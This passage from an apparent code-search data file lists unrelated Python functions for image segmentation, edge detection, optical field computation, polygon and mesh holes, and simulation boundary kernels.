plt.title(\"Markers\")\n \n # Do watershed\n markers = cv2.watershed(imgCopy, markers)\n \n imgCopy[markers == -1] = [0, 255 ,0]\n\n if plotImage:\n plt.figure()\n plt.imshow(markers,cmap='jet')\n plt.title(\"Mask\")\n plt.figure()\n plt.imshow(img)\n plt.title(\"Original Image\")\n plt.figure()\n plt.imshow(imgCopy)\n plt.title(\"Marked Image\")\n plt.show()\n\n return markers", "def approching_blackhole():\n blackhole = BlackHole()\n Rs = 8.0\n D_list = np.round(10**np.linspace(np.log10(50), np.log10(100000), 30))\n blackhole.open(blackhole.img_name, size=2000)\n\n for D in D_list:\n blackhole.compute(Rs, D)\n blackhole.img_save()", "def erode(img, kernel_h, kernel_w):\n # kernel_w and kernel_h chosen to get 4 clear markers in first frame to set initial limb coordinates.\n \"\"\" if majority of kernel is blue, else erase\"\"\"\n y = 0\n print(frame_height)\n while y < frame_height - kernel_h:\n x = 0\n while x < frame_width - kernel_w:\n # where Red exist\n kernel = img[y:y+kernel_h, x:x+kernel_w, 2] > 0 + numpy.zeros((kernel_h, kernel_w))\n\n if numpy.all(kernel == 0):\n pass\n elif numpy.sum(kernel) < (kernel_w*kernel_h)*0.85:\n img[y:y+kernel_h, x:x+kernel_w, 1:3] = 0\n else:\n img[y:y+kernel_h, x:x+kernel_w, 2] = 255\n\n x += kernel_w\n y += kernel_h", "def fill_blind_pores(im):\n holes = find_disconnected_voxels(im)\n im[holes] = False\n return im", "def gimme_the_hole(required_hole_size):\n\tgood_object = spray(required_hole_size)\n\tmake_hole(required_hole_size, good_object)\n\treturn good_object", "def create_hard_blocks(self):\n for x in xrange(1, self.map_size[0], 2):\n for y in xrange(1, self.map_size[1], 2):\n self.create_hard_block_at(x, y)", "def glow_boundary(bound):\n assert bound < 4\n global layout\n temp = len(layout) - 1\n for i in range(bound, bound + len_square(bound)):\n for j in range(bound, bound + len_square(bound)): # TODO: assign this to a variable\t\n layout[i][j] = 1", "def focus_field_beam(shape = (128,128,128),\n units = (0.1,0.1,0.1),\n lam =.5, NA = .6, n0 = 1.,\n return_all_fields = False,\n n_integration_steps = 200):\n\n\n p = OCLProgram(absPath(\"kernels/psf_debye.cl\"),\n build_options = [\"-I\",absPath(\"kernels\"),\"-D\",\"INT_STEPS=%s\"%n_integration_steps])\n\n if np.isscalar(NA):\n NA = [0.,NA]\n \n Nx0, Ny0, Nz0 = shape\n dx, dy, dz = units\n\n #FIXME: the loop below does not yet work for odd inputs\n if not Nx0%2+Ny0%2+Nz0%2==0:\n raise NotImplementedError(\"odd shapes not supported yet\")\n\n\n alphas = np.arcsin(np.array(NA)/n0)\n assert len(alphas)%2 ==0\n\n # as we assume the psf to be symmetric, we just have to calculate each octant\n Nx = Nx0//2+1\n Ny = Ny0//2+1\n Nz = Nz0//2+1\n\n u_g = OCLArray.empty((Nz,Ny,Nx),np.float32)\n ex_g = OCLArray.empty(u_g.shape,np.complex64)\n ey_g = OCLArray.empty(u_g.shape,np.complex64)\n ez_g = OCLArray.empty(u_g.shape,np.complex64)\n\n alpha_g = OCLArray.from_array(alphas.astype(np.float32))\n\n \n p.run_kernel(\"debye_wolf\",u_g.shape[::-1],None,\n ex_g.data,ey_g.data,ez_g.data, u_g.data,\n np.float32(1.),np.float32(0.),\n np.float32(0.),np.float32(dx*(Nx-1.)),\n np.float32(0.),np.float32(dy*(Ny-1.)),\n np.float32(0.),np.float32(dz*(Nz-1.)),\n np.float32(lam), np.float32(n0),\n alpha_g.data, np.int32(len(alphas)))\n\n u = u_g.get()\n ex = ex_g.get()\n ey = ey_g.get()\n ez = ez_g.get()\n\n u_all = np.empty((Nz0,Ny0,Nx0),np.float32)\n ex_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n ey_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n ez_all = np.empty((Nz0,Ny0,Nx0),np.complex64)\n\n sx = [slice(0,Nx),slice(Nx,Nx0)]\n sy = [slice(0,Ny),slice(Ny,Ny0)]\n sz = [slice(0,Nz),slice(Nz,Nz0)]\n\n\n\n # spreading the calculated octant to the full volume\n for i,j,k in itertools.product([0,1],[0,1],[0,1]):\n\n # i, j, k = 0 indicates the + octant\n\n u_all[sz[1-i],sy[1-j],sx[1-k]] = u[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n if i ==0:\n ex_all[sz[1-i],sy[1-j],sx[1-k]] = ex[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n ey_all[sz[1-i],sy[1-j],sx[1-k]] = ey[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n ez_all[sz[1-i],sy[1-j],sx[1-k]] = ez[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k]\n\n else:\n ex_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ex[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n ey_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ey[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n ez_all[sz[1-i],sy[1-j],sx[1-k]] = np.conjugate(ez[1-i:Nz-1+i,1-j :Ny-1+j,1-k :Nx-1+k][::(-1)**i,::(-1)**j,::(-1)**k])\n\n if return_all_fields:\n return u_all, ex_all, ey_all, ez_all\n else:\n return u_all", "def sharpen(im):\n kernel = np.array([[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]])\n im = cv2.filter2D(im, -1, kernel)\n return im", "def ghosal_edge(img,Ks,thr=1,thrmax=0.995,lmin = 0.5,phimin=1.4,thresholding=True, debug=False):\n\ttotaltime = time.time()\n\tkerneltime = time.time()\n\t# Ks must be odd\n\tif Ks%2 != 1:\n\t\tprint(\"Ks must be odd! Continuing with Ks = Ks-1\")\n\t\tKs = Ks-1\n\t# define the rectangular kernels\n\t#Vc00 = np.zeros((Ks,Ks),dtype=complex)\n\tVc11 = np.zeros((Ks,Ks),dtype=complex)\n\tVc20 = np.zeros((Ks,Ks),dtype=complex)\n\tofs = 1 *(1-1/Ks) # offset for centering kernel around 0,0\n\tfor i in range(Ks):\n\t\tfor j in range(Ks):\n\t\t\tKx = 2*j/Ks-ofs # limits of integration between -1 and 1\n\t\t\tKy = 2*i/Ks-ofs\n\t\t\tif Kx**2+Ky**2 <= 1: # only a circle\n\t\t\t\t#Vc00[i,j] = 1 # the conjugate of V00\n\t\t\t\tVc11[i,j] = Kx-Ky*1j # ...\n\t\t\t\tVc20[i,j] = 2*Kx**2+2*Ky**2-1\n\tkerneltime = time.time() - kerneltime\n\t\n\t# Kernel Plots\n\t#\tVCplot = Vc00\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real w K Vc00\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag w K Vc00\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = Vc11\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real w K Vc11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag w K Vc11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = Vc20\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real w K Vc20\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag w K Vc20\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t\n\t# do the convolution with the images to get the zernike moments\n\tAnorm = lambda n : (n+1)/np.pi\t# a normalization value\n\tconvolvetime = time.time()\n\t#A00 = scig.convolve2d(img,Vc00,mode='same')\n\t#\tA11 = Anorm(1)*scig.convolve2d(img,Vc11,mode='same')\n\t#\tA20 = Anorm(2)*scig.convolve2d(img,Vc20,mode='same')\n\tA11 = Anorm(1)*scig.oaconvolve(img,Vc11,mode='same')\n\tA20 = Anorm(2)*scig.oaconvolve(img,Vc20,mode='same')\n\tconvolvetime = time.time() - convolvetime\n\t# Plot Zernike moments\n\t#\tVCplot = A00\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real A00\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag A00\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = A11\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real A11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag A11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = A20\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real A20\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag A20\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t\n\tparamstime = time.time()\n\t# calculate the edge paramters\n\t#\ttanphi = np.imag(A11)/np.real(A11)\n\t#\tphi = np.arctan(tanphi)\n\t#\tcosphi = np.cos(phi)\n\t#\tsinphi = cosphi*tanphi\n\t#\tAl11 = np.real(A11)*cosphi+np.imag(A11)*sinphi\n\t\n\tphi = np.arctan(np.imag(A11)/np.real(A11))\n\tAl11 = np.real(A11)*np.cos(phi)+np.imag(A11)*np.sin(phi)\n\t\n\t#\tAl11 = A11*np.exp(-phi*1j)\n\tl = A20/Al11 # A20 has no imaginary component so A20 = A'20\n\n\tk = 3*Al11/(2*(1-l**2)**(3/2))\n\tparamstime = time.time() - paramstime\n\t\n\t# Plot edge paramters\n\t#\tVCplot = phi\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real phi\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag phi\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = Al11\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real A\\'11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag A\\'11\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = l\n\t#\tplt.pcolormesh(np.real(VCplot))#,vmin=-5,vmax=5\n\t#\tplt.title(\"real l\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot)) # ,vmin=-5,vmax=5\n\t#\tplt.title(\"imag l\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tVCplot = k\n\t#\tplt.pcolormesh(np.real(VCplot))\n\t#\tplt.title(\"real k\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t#\tplt.pcolormesh(np.imag(VCplot))\n\t#\tplt.title(\"imag k\")\n\t#\tplt.colorbar()\n\t#\tplt.show()\n\t\n\t\n\ttreattime = time.time()\n\tif thresholding==True:\n\t\t# do the thresholding\n\t\tif (thrmax<0)&(thr>0):\n\t\t\tknorm = np.sort(k.flatten())[[int(thr*np.size(k)),int(thrmax*np.size(k))]]\n\t\t\tidx = (abs(l)<lmin)&(abs(phi)>phimin)&(abs(k)>knorm[0])\n\t\telif thrmax>0:\n\t\t\tknorm = np.sort(k.flatten())[[int(thr*np.size(k)),int(thrmax*np.size(k))]]\n\t\t\tidx = (abs(l)<lmin)&(abs(phi)>phimin)&(abs(k)>knorm[0])&(abs(k)<knorm[1])\n\t\telif thr<0:\n\t\t\tidx = (abs(l)<lmin)&(abs(phi)>phimin)\n\t\t\tknorm = np.sort(k[idx].flatten())[int(thr)]\n\t\t\tidx = idx&(abs(k)>abs(knorm))\n\t\tne = np.sum(idx)\n\telif thresholding==False:\n\t\traise ValueError(\"this option is not still uncer development\")\n\t\t# no thresholding\n\t\tidx = np.ones(np.shape(l),dtype=bool)\n\t\tne =np.sum(idx)\n\telse:\n\t\traise ValueError(\"thresholding should be boolean\")\n\t\n\t# put all detected points in a vector of (x,y) values\n\tedg = np.zeros((ne,2))\n\torg = np.zeros((ne,2))\n\tnx,ny = np.shape(img)\n\te = 0\n\tfor i in range(nx):\n\t\tfor j in range(ny):\n\t\t\tif idx[i,j]:\n\t\t\t\tedg[e]=np.array([i,j]) + l[i,j]*Ks/2*np.array(\n\t\t\t\t\t[np.sin(phi[i,j]),-np.cos(phi[i,j])])\n\t\t\t\torg[e]=np.array([i,j])\n\t\t\t\te +=1\n\ttreattime = time.time() - treattime\n\ttotaltime = time.time() - totaltime\n\tprint(\"total %0.5f\tconvolution %0.5f\tthresholding %0.5f\tparamters %0.5f\tkernel %0.5f\"%(totaltime,convolvetime,treattime,paramstime,kerneltime))\n\t\n\tif debug==True:\n\t\treturn edg, org, k, l, phi\n\telse:\n\t\treturn edg, org", "def apply_sharpening_on(image):\n # Create kernel\n kernel = np.array([[0, -1, 0],\n [-1, 5, -1],\n [0, -1, 0]])\n\n # Sharpen image\n sharp_image = cv2.filter2D(image, -1, kernel)\n return sharp_image", "def fill():\n # Switch in edit mode\n bpy.ops.object.mode_set(mode = 'EDIT')\n \n # Fill hole\n bpy.ops.mesh.fill()", "def opencv_watershed(masked, mask) -> JSON_TYPE:\n # For code and detailed explanation see:\n # http://datahacker.rs/007-opencv-projects-image-segmentation-with-watershed-algorithm/\n threshold: int = 30\n gray = cv2.cvtColor(masked, cv2.COLOR_RGB2GRAY)\n ret, thresh_img = cv2.threshold(gray, threshold, 255, cv2.THRESH_BINARY)\n # Noise removal\n kernel = np.ones((3), np.uint8)\n opening_img = cv2.morphologyEx(thresh_img, cv2.MORPH_OPEN, kernel, iterations=9)\n # Noise removal\n closing_img = cv2.morphologyEx(thresh_img, cv2.MORPH_CLOSE, kernel, iterations=4)\n dist_transform = cv2.distanceTransform(255 - closing_img, cv2.DIST_L2, 3)\n local_max_location = peak_local_max(dist_transform, min_distance=1, indices=True)\n\n n_increases: int = 0\n while local_max_location.shape[0] < 30 and n_increases < 15:\n threshold += 20\n ret, thresh_img = cv2.threshold(gray, threshold, 255, cv2.THRESH_BINARY)\n # Noise removal\n kernel = np.ones((3), np.uint8)\n opening_img = cv2.morphologyEx(thresh_img, cv2.MORPH_OPEN, kernel, iterations=9)\n # Noise removal\n closing_img = cv2.morphologyEx(thresh_img, cv2.MORPH_CLOSE, kernel, iterations=4)\n dist_transform = cv2.distanceTransform(255 - closing_img, cv2.DIST_L2, 3)\n local_max_location = peak_local_max(dist_transform, min_distance=1, indices=True)\n n_increases += 1\n # Reset threshold\n threshold = 30\n\n num_clusters: int = 30\n if n_increases >= 15:\n num_clusters = local_max_location.shape[0]\n kmeans = KMeans(n_clusters=num_clusters)\n # If local_max_location size is 0, return 0 predictions\n if not local_max_location.size:\n return {\n \"count\": 0\n }\n kmeans.fit(local_max_location)\n local_max_location = kmeans.cluster_centers_.copy()\n # Kmeans is returning a float data type so we need to convert it to an int. \n local_max_location = local_max_location.astype(int)\n dist_transform_copy = dist_transform.copy()\n for i in range(local_max_location.shape[0]):\n cv2.circle(dist_transform_copy, (local_max_location[i][1], local_max_location[i][0]), 5, 255)\n # markers = np.zeros_like(dist_transform)\n ret, sure = cv2.threshold(dist_transform, 0.01*dist_transform.max(), 255, 0)\n sure = np.uint8(sure)\n ret, markers = cv2.connectedComponents(sure)\n labels = np.arange(kmeans.n_clusters)\n markers[local_max_location[:,0], local_max_location[:,1]] = labels + 1\n # Convert all local markers to an integer. This because cluster centers will be float numbers. \n markers = markers.astype(int)\n markers_copy = markers.copy()\n index_non_zero_markers = np.argwhere(markers != 0)\n markers_copy = markers_copy.astype(np.uint8)\n font = cv2.FONT_HERSHEY_SIMPLEX\n for i in range(index_non_zero_markers.shape[0]):\n string_text = str(markers[index_non_zero_markers[i][0], index_non_zero_markers[i][1]])\n cv2.putText(markers_copy, string_text, (index_non_zero_markers[i][1], index_non_zero_markers[i][0]), font, 1, 255)\n markers = markers.astype(np.int32)\n segmented = cv2.watershed(masked, markers)\n count_segments(markers)\n #return {\n # \"count\": local_max_location.shape[0]\n #}\n return {\n \"count\": count_segments(markers),\n }", "def watershed_segment(M,xM=None,yM=None):\n\n if xM != None and yM != None:\n sel = np.ones((int(ceil(23.9*xM)),int(ceil(23.9*yM)))) # for opening\n sel2 = np.ones((int(ceil(127.2*xM)),int(ceil(127.2*yM)))) # for local thresholding\n sel3 = np.ones((int(ceil(11.9*xM)),int(ceil(11.9*yM)))) # for erosion\n ma,mi =(44245.21*xM*yM),(316.037*xM*yM) \n else:\n selD = np.array([int(M.shape[0]*.012),int(M.shape[1]*.012)])\n selD = np.where(selD!=0,selD,1)\n \n sel2D = np.array([int(M.shape[0]*.12),int(M.shape[1]*.12)])\n sel2D = np.where(sel2D!=0,sel2D,1)\n\n sel3D = np.array([int(M.shape[0]*.01),int(M.shape[1]*.01)])\n sel3D = np.where(sel3D!=0,sel3D,1)\n\n\n sel = np.ones(selD) # for opening\n sel2 = np.ones(sel2D) # for local thresholding\n sel3 = np.ones(sel3D) # for erosion\n ma,mi = (M.shape[0]*M.shape[1]*.0075),(M.shape[0]*M.shape[1]*.0003)\n\n # get a few points in the center of each blob\n \n # threshold\n bw = ((M>=ndi.percentile_filter(M,80,footprint=sel2)))\n #& (M>=stats.scoreatpercentile(M.flatten(),80)))\n\n # open and erode\n blobs = snm.binary_opening(bw,structure=sel)\n blobs = snm.binary_erosion(blobs,structure=sel3,iterations=2)\n \n # label\n labels,_ = ndi.label(blobs)\n labels[labels > 0] += 1\n labels[0,0] = 1\n\n # rescale and cast to int16, then use watershed\n #M2 = rescaled(M,0,65000).astype(np.uint16)\n #newlabels = ndi.watershed_ift(M2,labels)\n newlabels = labels\n \n # get rid of groups unless they have the right number of pixels\n\n counts = np.bincount(newlabels.flatten())\n old2new = np.arange(len(counts)) \n old2new[(counts < int(mi)) | (counts > int(ma))] = 0\n newlabels = old2new[newlabels]\n\n return newlabels", "def RemovePolygonHoles_management(in_fc, threshold=0.0):\n desc = arcpy.Describe(in_fc)\n if desc.dataType != \"FeatureClass\" and desc.dataType != \"ShapeFile\":\n print(\"Invalid data type. The input is supposed to be a Polygon FeatureClass or Shapefile.\")\n return\n else:\n if desc.shapeType != \"Polygon\":\n print(\"The input is supposed to be a Polygon FeatureClass or Shapefile.\")\n return\n if threshold < 0.0:\n threshold = 0.0\n with arcpy.da.UpdateCursor(in_fc, [\"SHAPE@\"]) as updateCursor:\n for updateRow in updateCursor:\n shape = updateRow[0]\n new_shape = arcpy.Array()\n for part in shape:\n new_part = arcpy.Array()\n if threshold > 0:\n # find None point in shape part\n # in arcpy module, a None point is used to seperate exterior and interior vertices\n null_point_index = []\n for i in range(len(part)):\n if part[i] is None:\n null_point_index.append(i)\n # if interior vertices exist, create polygons and compare polygon shape area to given threshold\n # if larger, keep vertices, else, dismiss them\n if len(null_point_index) > 0:\n for k in range(0, null_point_index[0]):\n new_part.add(part[k])\n for i in range(len(null_point_index)):\n pointArray = arcpy.Array()\n # determine if the None point is the last one\n if i+1 < len(null_point_index):\n for j in range(null_point_index[i] + 1, null_point_index[i+1]):\n pointArray.add(part[j])\n else:\n for j in range(null_point_index[i] + 1, len(part)):\n pointArray.add(part[j])\n # create a polygon to check shape area against the given threshold\n inner_poly = arcpy.Polygon(pointArray)\n # if larger than threshold, then add to the new part Array\n if inner_poly.area > threshold:\n if i+1 < len(null_point_index):\n for k in range(null_point_index[i], null_point_index[i+1]):\n new_part.add(part[k])\n else:\n for k in range(null_point_index[i], len(part)):\n new_part.add(part[k])\n new_shape.add(new_part)\n # if interior does not exist, add the whole part\n else:\n new_shape.add(part)\n else:\n # get the first None point index\n first_null_point_index = 0\n for i in range(len(part)):\n if part[i] is None:\n first_null_point_index = i\n break\n if first_null_point_index == 0:\n new_shape.add(part)\n else:\n for j in range(first_null_point_index):\n new_part.add(part[j])\n new_shape.add(new_part)\n if len(new_shape) > 0:\n new_poly = arcpy.Polygon(new_shape)\n updateRow[0] = new_poly\n updateCursor.updateRow(updateRow)", "def grass_drass():", "def show_holes_on_img(mask,img):\n labeled, num_objects = ndi.label(mask)\n slices = ndi.find_objects(labeled)\n radius=9\n out_image = img.copy()\n out_image = cv2.cvtColor(out_image, cv2.COLOR_GRAY2RGB)\n for dy,dx in slices:\n x_center = (dx.start + dx.stop - 1)/2\n y_center = (dy.start + dy.stop - 1)/2 \n center=(x_center,y_center)\n cv2.circle(out_image, center, radius,(111,17,108),thickness=2)\n\n plt.figure()\n plt.imshow(out_image)\n plt.autoscale(False)\n return out_image", "def fillHoles(img):\n out,contour,hierarchy = cv2.findContours(img,cv2.RETR_CCOMP,cv2.CHAIN_APPROX_NONE)\n i=0\n for cnt in contour:\n cv2.drawContours(img,contour,i,255,-1)\n i+=1\n return img", "def gen_penalise_field_boundary_pyst_kernel_2d(\n width: int,\n dx: float,\n x_grid_field: np.ndarray,\n y_grid_field: np.ndarray,\n real_t: type,\n num_threads: bool | int = False,\n fixed_grid_size: tuple[int, int] | bool = False,\n) -> Callable:\n # TODO expand docs\n assert width >= 0 and isinstance(width, int), \"invalid zone width\"\n\n if width == 0:\n # bypass option to prevent penalisation, done this way since by\n # default to avoid artifacts one must use penalisation...\n def penalise_field_boundary_pyst_kernel_2d(field: np.ndarray) -> None:\n pass\n\n else:\n pyst_dtype = spu.get_pyst_dtype(real_t)\n grid_info = (\n f\"{fixed_grid_size[0]}, {fixed_grid_size[1]}\"\n if type(fixed_grid_size) is tuple[int, ...]\n else \"2D\"\n )\n x_grid_field_start = x_grid_field[0, 0]\n y_grid_field_start = y_grid_field[0, 0]\n x_grid_field_end = x_grid_field[0, -1]\n y_grid_field_end = y_grid_field[-1, 0]\n\n sine_prefactor = (np.pi / 2) / (width * dx)\n\n x_front_boundary_slice = ps.make_slice[:, :width]\n x_front_boundary_kernel_config = spu.get_pyst_kernel_config(\n real_t,\n num_threads,\n iteration_slice=x_front_boundary_slice,\n )\n x_back_boundary_slice = ps.make_slice[:, -width:]\n x_back_boundary_kernel_config = spu.get_pyst_kernel_config(\n real_t,\n num_threads,\n iteration_slice=x_back_boundary_slice,\n )\n\n @ps.kernel\n def penalise_field_x_front_boundary_stencil_2d():\n field, x_grid_field = ps.fields(\n f\"field, x_grid_field : {pyst_dtype}[{grid_info}]\"\n )\n field[0, 0] @= field[0, 0] * sp.sin(\n sine_prefactor * (x_grid_field[0, 0] - x_grid_field_start)\n )\n\n penalise_field_x_front_boundary_kernel_2d = ps.create_kernel(\n penalise_field_x_front_boundary_stencil_2d,\n config=x_front_boundary_kernel_config,\n ).compile()\n\n @ps.kernel\n def penalise_field_x_back_boundary_stencil_2d():\n field, x_grid_field = ps.fields(\n f\"field, x_grid_field : {pyst_dtype}[{grid_info}]\"\n )\n field[0, 0] @= field[0, 0] * sp.sin(\n sine_prefactor * (x_grid_field_end - x_grid_field[0, 0])\n )\n\n penalise_field_x_back_boundary_kernel_2d = ps.create_kernel(\n penalise_field_x_back_boundary_stencil_2d,\n config=x_back_boundary_kernel_config,\n ).compile()\n\n y_front_boundary_slice = ps.make_slice[:width, :]\n y_front_boundary_kernel_config = spu.get_pyst_kernel_config(\n real_t,\n num_threads,\n iteration_slice=y_front_boundary_slice,\n )\n y_back_boundary_slice = ps.make_slice[-width:, :]\n y_back_boundary_kernel_config = spu.get_pyst_kernel_config(\n real_t,\n num_threads,\n iteration_slice=y_back_boundary_slice,\n )\n\n @ps.kernel\n def penalise_field_y_front_boundary_stencil_2d():\n field, y_grid_field = ps.fields(\n f\"field, y_grid_field : {pyst_dtype}[{grid_info}]\"\n )\n field[0, 0] @= field[0, 0] * sp.sin(\n sine_prefactor * (y_grid_field[0, 0] - y_grid_field_start)\n )\n\n penalise_field_y_front_boundary_kernel_2d = ps.create_kernel(\n penalise_field_y_front_boundary_stencil_2d,\n config=y_front_boundary_kernel_config,\n ).compile()\n\n @ps.kernel\n def penalise_field_y_back_boundary_stencil_2d():\n field, y_grid_field = ps.fields(\n f\"field, y_grid_field : {pyst_dtype}[{grid_info}]\"\n )\n field[0, 0] @= field[0, 0] * sp.sin(\n sine_prefactor * (y_grid_field_end - y_grid_field[0, 0])\n )\n\n penalise_field_y_back_boundary_kernel_2d = ps.create_kernel(\n penalise_field_y_back_boundary_stencil_2d,\n config=y_back_boundary_kernel_config,\n ).compile()\n\n def penalise_field_boundary_pyst_kernel_2d(field: np.ndarray) -> None:\n \"\"\"2D penalise field boundary kernel.\n\n Penalises field on the boundaries in a sine wave fashion\n in the given width in X and Y direction\n field: field to be penalised\n \"\"\"\n # first along X\n # these parts involve broadcasting hence couldn't be pystencilized\n field[:, :width] = field[:, (width - 1) : width]\n field[:, -width:] = field[:, -width : (-width + 1)]\n penalise_field_x_front_boundary_kernel_2d(\n field=field, x_grid_field=x_grid_field\n )\n penalise_field_x_back_boundary_kernel_2d(\n field=field, x_grid_field=x_grid_field\n )\n\n # then along Y\n # these parts involve broadcasting hence couldn't be pystencilized\n field[:width, :] = field[(width - 1) : width, :]\n field[-width:, :] = field[-width : (-width + 1), :]\n penalise_field_y_front_boundary_kernel_2d(\n field=field, y_grid_field=y_grid_field\n )\n penalise_field_y_back_boundary_kernel_2d(\n field=field, y_grid_field=y_grid_field\n )\n\n return penalise_field_boundary_pyst_kernel_2d", "def set_cell_to_hole(self):\n self.tick = \"H\"\n self.is_hole = True\n self.is_active = False", "def rectangle_mesh_with_hole(point1=Point(0,0), point2=Point(3,1), hole_cent=Point(1.5,0.5), \n hole_rad=0.25, npts=15):\n\n Router = mshr.Rectangle(point1, point2)\n Rinner = mshr.Circle(hole_cent, hole_rad)\n domain = Router - Rinner\n\n mesh = mshr.generate_mesh(domain, npts)\n print_mesh_stats(mesh)\n \n return mesh", "def ghosal_edge_v2(img,Ks,kmin=0,kmax=1000,lmax=0.5,phimin=1,thresholding=True,debug=False,mirror=False):\n\t# gather image properties before its altered\n\tni,nj = np.shape(img)\n\t# Ks must be odd\n\tif Ks%2 != 1:\n\t\tprint(\"Ks must be odd! Continuing with Ks = Ks-1\")\n\t\tKs = Ks-1\n\t# define the rectangular kernels\n\t#Vc00 = np.zeros((Ks,Ks),dtype=complex) # not needed\n\tVc11 = np.zeros((Ks,Ks),dtype=complex)\n\tVc20 = np.zeros((Ks,Ks),dtype=complex)\n\tofs = 1 *(1-1/Ks) # offset for centering kernel around 0,0\n\tfor i in range(Ks):\n\t\tfor j in range(Ks):\n\t\t\tKx = 2*j/Ks-ofs # limits of integration between -1 and 1\n\t\t\tKy = 2*i/Ks-ofs\n\t\t\tif Kx**2+Ky**2 <= 1: # only a circle\n\t\t\t\t#Vc00[i,j] = 1 # the conjugate of V00 # not needed\n\t\t\t\tVc11[i,j] = Kx-Ky*1j # ...\n\t\t\t\tVc20[i,j] = 2*Kx**2+2*Ky**2-1\n\t# mirror the edges to avoid edge effects from convolution\n\tif mirror:\n\t\tthick = int((Ks-1)/2)\n\t\timg = np.concatenate((img[:,(thick-1)::-1],img,img[:,:-(thick+1):-1]),1)\n\t\timg = np.concatenate((img[(thick-1)::-1,:],img,img[:-(thick+1):-1,:]),0)\n\t\tmode = \"valid\"\n\telse:\n\t\tmode = \"same\"\n\t\n\t# do the convolution with the images to get the zernike moments\n\tAnorm = lambda n : (n+1)/np.pi\t# a normalization value\n\t#A00 = scig.convolve2d(img,Vc00,mode='same') # not needed\n\tA11 = Anorm(1)*scig.oaconvolve(img,Vc11,mode=mode)\n\tA20 = Anorm(2)*scig.oaconvolve(img,Vc20,mode=mode)\n\n\tphi = np.arctan(np.imag(A11)/zero_to_small(np.real(A11)))\n\tAl11 = np.real(A11)*np.cos(phi)+np.imag(A11)*np.sin(phi)\n\tl = np.real(A20)/Al11 # A20 has no imaginary component so A20 = A'20\n\tl = np.minimum(l,1-SMALL) # chop off those that go beyond the kernel boundaries\n\tl = np.maximum(l,-1+SMALL)\n\tk = abs(3*Al11/(2*(1-l**2)**(3/2))) \n\t\n\tif thresholding==True:\n\t\t# conditions\n\t\tphi_c = abs(phi)>phimin\n\t\tl_c = abs(l)<lmax\n\t\tk_c = (k<kmax) & (k>kmin)\n\t\tvalid = phi_c & (k_c & l_c)\n\telif thresholding==False:\n\t\tvalid = np.ones_like(k)\n\t# define a grid of pixel positions\n\ti,j = np.meshgrid(np.arange(nj),np.arange(ni))\n\t\n\t# get a list of the valid relevant parameters \n\ti = i[valid]\n\tj = j[valid]\n\t#\tk = k[valid] # not necessary\n\tl = l[valid]\n\tphi = phi[valid]\n\t\n\t# convert to the subpixel position\n\ti_s = i+l*Ks/2*np.cos(phi)\n\tj_s = j+l*Ks/2*np.sin(phi)\n\t\n\t# put all detected points in a vector of (x,y) values\n\tedg = np.squeeze((j_s,i_s)).transpose()\n\torg = np.squeeze((j,i)).transpose()\n\tif debug==True:\n\t\treturn edg, org, k, l, phi\n\telse:\n\t\treturn edg, org", "def fill_single_world():\n if not front_is_clear():\n if not right_is_clear():\n if not left_is_clear():\n put_beeper()", "def create_outer_walls(space,width,height):\n static_lines = [pymunk.Segment(space.static_body, (0.0, 0.0), (width, 0.0), 0.0),\n pymunk.Segment(space.static_body, (width, 0.0), 